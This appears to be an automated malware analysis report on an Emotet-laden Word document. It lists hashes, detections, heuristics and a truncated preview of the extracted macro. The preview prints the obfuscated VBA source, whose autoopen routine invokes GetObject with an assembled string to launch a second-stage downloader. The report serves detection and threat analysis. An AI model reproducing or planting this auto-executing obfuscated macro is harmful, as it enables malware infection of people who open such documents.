Emotet Office (OLE) malware analysis — malicious · 982ceb7f89820083

MALICIOUS

Office (OLE)

220.8 KB Created: 2019-04-02 20:54:00 Authoring application: Microsoft Office Word First seen: 2021-07-07

MD5: a2c3a9ff740aa9da024a37c4f57fe790 SHA-1: 6c9c16b7b168034ba25a3386f9676ef7eb3c8b44 SHA-256: 982ceb7f898200836f847b10d81ee7faff43d103248981b66effc3e2ddc44d54

222 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file was detected as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6922353-0', indicating it is likely part of the Emotet family. The presence of an AutoOpen VBA macro, specifically using GetObject, strongly suggests the macro is designed to download and execute a second-stage payload. The obfuscated nature of the VBA code prevents a more detailed analysis of the specific download URL or execution method.

Heuristics 7

ClamAV: Doc.Downloader.Emotet-6922353-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6922353-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 32990 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	32990 bytes
SHA-256: `a5859d6c54b59bfee7ce9859231ff3435d6db12f4c38e1a7fb14e0d30a30e8c5`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "XAQBkA" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "wxwBDwZG" Attribute VB_Base = "0{8C207F09-D45C-4354-9678-EDCE14E8D983}{6FD50A05-7658-4AFC-9909-DD91C13A5A12}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "tADUBDQ" Attribute VB_Base = "0{F8F8B0BA-8CAD-492F-9938-90329B9C2B00}{AA37439C-A046-4740-9C6D-14883CB49D95}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "icAAA4Ak" Function iAAAAQc() If 968801687 = 698554612 Then NoDXABC = NAAAAGo + Int(191902396 * Asc(lAoUXAAA) + LxZk_A _ / 481272899) + AAoAwXAo / CLng(rXxkcoQD) - (bxAADAwA - FXcABCBx / 665876920 - Tan _ (o4ACkw) + (MUA1xAx / CSng(YCckA4oA) + _ 195905500 / Sgn(693659049) * (CAUGAQ + CVar(395205126)))) End If If 159317864 = 784235672 Then wxCUwQA = i_AXQAkc + Int(452685675 * Asc(n1C4AZ) + kA4ACoBc _ / 706049415) + aA4AAwU / CLng(OAZUQQ) - (EDwA1oGA - sAwAUBcA / 431381355 - Tan _ (aDQc1GA) + (KUABADAA / CSng(wA_ZQXck) + _ 507386640 / Sgn(667807939) * (GGABc_Ax + CVar(190171882)))) End If End Function Function DA1UcB() If 40728064 = 436499587 Then cAAQA_ = ukBUUAQ + Int(770176373 * Asc(nAADkBQA) + kAoQwA _ / 226956810) + rkAAxAZB / CLng(FDAAXG) - (YZAwZo - swA_QQGA / 284618245 - Tan _ (iAA4co) + (MGoGDAQ / CSng(c44ADkX) + _ 273767340 / Sgn(35381835) * (iAko_BA + CVar(239591774)))) End If If 575340778 = 325960289 Then QGUoBUAA = mBZoAw + Int(77699607 * Asc(SCxABQZB) + wUoXwA _ / 565143498) + RAUBkc1 / CLng(lDcQCA_C) - (skDkBA - sU1AQA41 / 258948210 - Tan _ (uGAAABA) + (WAUABQ / CSng(NZAGDAA) + _ 303046100 / Sgn(454669530) * (mAGXAB + CVar(411304349)))) End If End Function Sub autoopen() EBAxZADo End Sub Function EBAxZADo() On Error Resume Next If 588811461 = 547650308 Then jBAUcAwQ = VAADAAC + Int(655053883 * Asc(bBAZQAo) + FUkBBkA _ / 259189112) + UDDAAA / CLng(wAU_CAUA) - (GAXAAAD - PowAAA / 446357134 - Tan _ (IAA4AxA) + (jQwAUD / CSng(OxcXAQ) + _ 585803329 / Sgn(633114700) * (mAAAZUAc + CVar(860891315)))) End If If 325402014 = 403692577 Then iQkADUAC = wABQUAGA + Int(646286443 * Asc(MDAZxQA) + Gx1CCxAU _ / 502262463) + PZAABAkA / CLng(AAAwA_o) - (vUDAGAA - T41AAQD / 749061529 - Tan _ (zDGoA_k) + (lQBXBAD / CSng(mcAQ1BAG) + _ 51516853 / Sgn(201846791) * (tGxA41 + CVar(249964960)))) End If If 165370728 = 432108208 Then j_DAA1AX = YBQxwBUQ + Int(94348623 * Asc(UBQUXCAD) + Y_AAAZAA _ / 695744410) + kAAoAQG / CLng(hAxxwA) - (wAADZcx - LAAADUAA / 680501757 - Tan _ (aAAAZw) + (X4BoGG / CSng(p1wAAAw) + _ 313752168 / Sgn(240236454) * (cC14Bw + CVar(543199086)))) End If Set CU4QZAQA = GetObject(wxwBDwZG.VxkwACcA.Text + tADUBDQ.AQQAUDA + wxwBDwZG.VxkwACcA) If 704213573 = 4933024 Then bX1AAAZA = cAxADADw + Int(916744256 * Asc(RAGAZU) + OGABAQA _ / 488140956) + DCAQA1 / CLng(VkQUZD) - (KQADQA_ - L1A4U_A / 804734803 - Tan _ (IAAGUXX1) + (cXABADAB / CSng(W_BxQcx) + _ 695976957 / Sgn(714784738) * (vAwkXUD + CVar(252985861)))) End If If 773105500 = 640758614 Then k_1AoAo = pUZBGQo + Int(443403743 * Asc(Y41QZAwA) + hDAAZGU _ / 630792612) + uQAABD4A / CLng(IDBBABUG) - (jAA_CAAG - rAAUAU / 683727527 - Tan _ (VA4AXU) + (MAAAxB1k / CSng(XDkAA1AA) + _ 898090689 / Sgn(947310579) * (zXA_UUDB + CVar(608285618)))) End If If 862658022 = 468967744 Then AAAAA1c = LABoAA + Int(43606693 * Asc(wAZQACZc) + wABABD_B _ / 54797715) + v_A4xA / CLng(lGAAcQQB) - (SACkAAxG - bAwcUA / 7062242 - Tan _ (IxAUc_Dx) + (SAZADUB / CSng(MD4D_DAB) + _ 443149646 / Sgn(940644877) * (bccDA1 + CVar(326396013)))) ... (truncated)

SHA-256: a5859d6c54b59bfee7ce9859231ff3435d6db12f4c38e1a7fb14e0d30a30e8c5

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "XAQBkA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "wxwBDwZG"
Attribute VB_Base = "0{8C207F09-D45C-4354-9678-EDCE14E8D983}{6FD50A05-7658-4AFC-9909-DD91C13A5A12}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "tADUBDQ"
Attribute VB_Base = "0{F8F8B0BA-8CAD-492F-9938-90329B9C2B00}{AA37439C-A046-4740-9C6D-14883CB49D95}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "icAAA4Ak"
Function iAAAAQc()
   If 968801687 = 698554612 Then
NoDXABC = NAAAAGo + Int(191902396 * Asc(lAoUXAAA) + LxZk_A _
/ 481272899) + AAoAwXAo / CLng(rXxkcoQD) - (bxAADAwA - FXcABCBx / 665876920 - Tan _
(o4ACkw) + (MUA1xAx / CSng(YCckA4oA) + _
195905500 / Sgn(693659049) * (CAUGAQ + CVar(395205126))))
End If
   If 159317864 = 784235672 Then
wxCUwQA = i_AXQAkc + Int(452685675 * Asc(n1C4AZ) + kA4ACoBc _
/ 706049415) + aA4AAwU / CLng(OAZUQQ) - (EDwA1oGA - sAwAUBcA / 431381355 - Tan _
(aDQc1GA) + (KUABADAA / CSng(wA_ZQXck) + _
507386640 / Sgn(667807939) * (GGABc_Ax + CVar(190171882))))
End If
End Function
Function DA1UcB()
   If 40728064 = 436499587 Then
cAAQA_ = ukBUUAQ + Int(770176373 * Asc(nAADkBQA) + kAoQwA _
/ 226956810) + rkAAxAZB / CLng(FDAAXG) - (YZAwZo - swA_QQGA / 284618245 - Tan _
(iAA4co) + (MGoGDAQ / CSng(c44ADkX) + _
273767340 / Sgn(35381835) * (iAko_BA + CVar(239591774))))
End If
   If 575340778 = 325960289 Then
QGUoBUAA = mBZoAw + Int(77699607 * Asc(SCxABQZB) + wUoXwA _
/ 565143498) + RAUBkc1 / CLng(lDcQCA_C) - (skDkBA - sU1AQA41 / 258948210 - Tan _
(uGAAABA) + (WAUABQ / CSng(NZAGDAA) + _
303046100 / Sgn(454669530) * (mAGXAB + CVar(411304349))))
End If
End Function
Sub autoopen()
EBAxZADo
End Sub
Function EBAxZADo()
On Error Resume Next
   If 588811461 = 547650308 Then
jBAUcAwQ = VAADAAC + Int(655053883 * Asc(bBAZQAo) + FUkBBkA _
/ 259189112) + UDDAAA / CLng(wAU_CAUA) - (GAXAAAD - PowAAA / 446357134 - Tan _
(IAA4AxA) + (jQwAUD / CSng(OxcXAQ) + _
585803329 / Sgn(633114700) * (mAAAZUAc + CVar(860891315))))
End If
   If 325402014 = 403692577 Then
iQkADUAC = wABQUAGA + Int(646286443 * Asc(MDAZxQA) + Gx1CCxAU _
/ 502262463) + PZAABAkA / CLng(AAAwA_o) - (vUDAGAA - T41AAQD / 749061529 - Tan _
(zDGoA_k) + (lQBXBAD / CSng(mcAQ1BAG) + _
51516853 / Sgn(201846791) * (tGxA41 + CVar(249964960))))
End If
   If 165370728 = 432108208 Then
j_DAA1AX = YBQxwBUQ + Int(94348623 * Asc(UBQUXCAD) + Y_AAAZAA _
/ 695744410) + kAAoAQG / CLng(hAxxwA) - (wAADZcx - LAAADUAA / 680501757 - Tan _
(aAAAZw) + (X4BoGG / CSng(p1wAAAw) + _
313752168 / Sgn(240236454) * (cC14Bw + CVar(543199086))))
End If
Set CU4QZAQA = GetObject(wxwBDwZG.VxkwACcA.Text + tADUBDQ.AQQAUDA + wxwBDwZG.VxkwACcA)
   If 704213573 = 4933024 Then
bX1AAAZA = cAxADADw + Int(916744256 * Asc(RAGAZU) + OGABAQA _
/ 488140956) + DCAQA1 / CLng(VkQUZD) - (KQADQA_ - L1A4U_A / 804734803 - Tan _
(IAAGUXX1) + (cXABADAB / CSng(W_BxQcx) + _
695976957 / Sgn(714784738) * (vAwkXUD + CVar(252985861))))
End If
   If 773105500 = 640758614 Then
k_1AoAo = pUZBGQo + Int(443403743 * Asc(Y41QZAwA) + hDAAZGU _
/ 630792612) + uQAABD4A / CLng(IDBBABUG) - (jAA_CAAG - rAAUAU / 683727527 - Tan _
(VA4AXU) + (MAAAxB1k / CSng(XDkAA1AA) + _
898090689 / Sgn(947310579) * (zXA_UUDB + CVar(608285618))))
End If
   If 862658022 = 468967744 Then
AAAAA1c = LABoAA + Int(43606693 * Asc(wAZQACZc) + wABABD_B _
/ 54797715) + v_A4xA / CLng(lGAAcQQB) - (SACkAAxG - bAwcUA / 7062242 - Tan _
(IxAUc_Dx) + (SAZADUB / CSng(MD4D_DAB) + _
443149646 / Sgn(940644877) * (bccDA1 + CVar(326396013))))

... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.